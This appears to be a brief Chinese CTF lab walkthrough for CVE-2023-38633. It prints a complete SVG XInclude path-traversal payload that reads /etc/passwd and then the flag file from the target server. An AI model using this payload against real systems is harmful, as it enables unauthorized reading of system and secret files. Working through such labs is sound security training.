今天我们来攻克春秋云境CTF的CVE-2023-38633
# 我们通过抓包来构造POC来查找/etc/passwd
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="1000" height="1000" xmlns:xi="http://www.w3.org/2001/XInclude">
<rect width="600" height="600" style="fill:rgb(255,255,255);" />
<text x="10" y="100">
<xi:include href=".?../../../../../../../../etc/passwd" parse="text"
encoding="UTF-8">
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>
这样我们就看到了/etc/passwd文件里面的内容
# 既然可以看到/etc/passwd的内容,那我们就可以查看flag
.?../../../../../../../../flag
好小子,离成功又近一步!!!
标签:..,passwd,flag,38633,etc,云境,XXE,CVE From: https://blog.csdn.net/weixin_67832625/article/details/141091495